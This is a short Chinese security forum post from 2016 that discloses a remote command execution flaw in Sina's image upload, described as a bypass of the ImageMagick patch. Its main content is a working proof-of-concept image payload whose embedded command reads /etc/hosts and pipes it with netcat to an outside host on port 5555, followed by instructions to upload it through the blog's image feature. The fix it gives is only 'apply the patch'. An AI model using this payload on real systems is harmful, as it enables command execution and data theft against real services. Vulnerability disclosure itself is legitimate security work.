HanDs
NO.2

[7月漏洞公开] 新浪存在远程命令执行漏洞(ImageMagick补丁绕过) 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

新浪存在远程命令执行漏洞(ImageMagick补丁绕过)

详细说明:

详情:

http://permalink.gmane.org/gmane.comp.security.oss.general/19669



poc.png

code 区域
push graphic-context
viewbox 0 0 640 480
image Over 0,0 0,0 '|cat /etc/hosts|nc xx.xx.xx.xx 5555'
pop graphic-context







博客上传图片的地方上传一个图片

02.png

漏洞证明:

02.png

修复方案:

打补丁


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
新浪
#1楼
发帖时间:2016-7-15   |   查看数:0   |   回复数:0
游客组